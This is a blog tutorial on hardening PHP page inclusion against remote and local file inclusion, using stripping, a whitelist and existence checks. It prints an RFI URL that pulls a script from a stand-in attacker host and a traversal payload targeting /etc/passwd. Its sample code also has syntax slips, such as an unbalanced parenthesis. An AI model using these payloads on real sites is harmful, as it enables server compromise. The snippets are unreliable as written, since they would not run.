• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    SBS opening Fix Autosultan

    Autosultan zonamotivasi
    Januari 25, 2022
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "PHP Page Inclusion Hardening"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationsPHP Page Inclusion Hardening
    PHP Page Inclusion Hardening

    PHP Page Inclusion Hardening

    Simpan Postingan


    One of Web App's Bugs is Remote File Inclusion. It bug can be easly exploitation because web developer is forgot to validate the requested page before including the page. So a hacker can put a remote script to the requested variable.
    example:

    http://site.com/?page=http://hack.er/script.txt??

    so, it included by the script

    In a moment of page processing, hacker's script included by the server and it processed. If it does, it can be called a hacker got the server. And administrator can only say dead!! Dead without blood, only tears.

    Because of that, validate a requested page before include it is very important. It is a simple only, but sometimes overlooked or forgotten. I will make an example how to validate a requested page. A simple way to validate the requested page for inclusion.

    Let's Start !

    $file is a variable which i will include it into my page. $file is send by "get" method. this is standart include page from "get" variable.

    $file = $_GET['file'];


    Before validation, $file must be clear from "injected" variable like rfi or lfi. So, laundry it first.

    $file = $_GET['file'];

    $file = str_replace("http://","",$file);

    $file = str_replace("/","",$file);

    $file = str_replace("..","",$file);

    now $file is clear from injected variable. See it.

    $file = "http://hack.er/evil.txt";

    after laundry, $file is hack.erevil.txt

    and it if trying lfi exploit.

    $file = "../../../../../../../etc/passwd";

    after laundry, $file is etcpasswd;

    $file is clear. next step.

    Simple method to validate a page is check exists page in a directory. But checking to the directory is use more server's memory. To decrease used memory, i will check exist file if $file is valid first. valid page is defined in an array where contain a list of valid page.

    $validpage = array("article","contact","news","product");

    article, contact, news, product is a valid page. Put any valid page in $validpage.

    first validation, check $file. if $file is found in $validpage, it is valid page.


    $file = (in_array($file,$validpage))?$file:index;

    if $file is not in $validpage, values of $file is replace with "index".

    after this step, $file have contained with a valid page. now, i will check if it is existed file. I do not want include unexisted file, do not let an error on page, it will give another clue for hacker.

    $file = ((file_exists($file.".php"))?$file:index;

    Done. $file are filtered and validated. Now I can include $file without worried.

    include($file.".php");


    Do not forgot to put an index.php file, because it is your default page if file not valid or not exist.



    And now, I can sleep in peace and sweet dreams.

    Thanks.

    ArRay
    Exploitations
    September 23, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan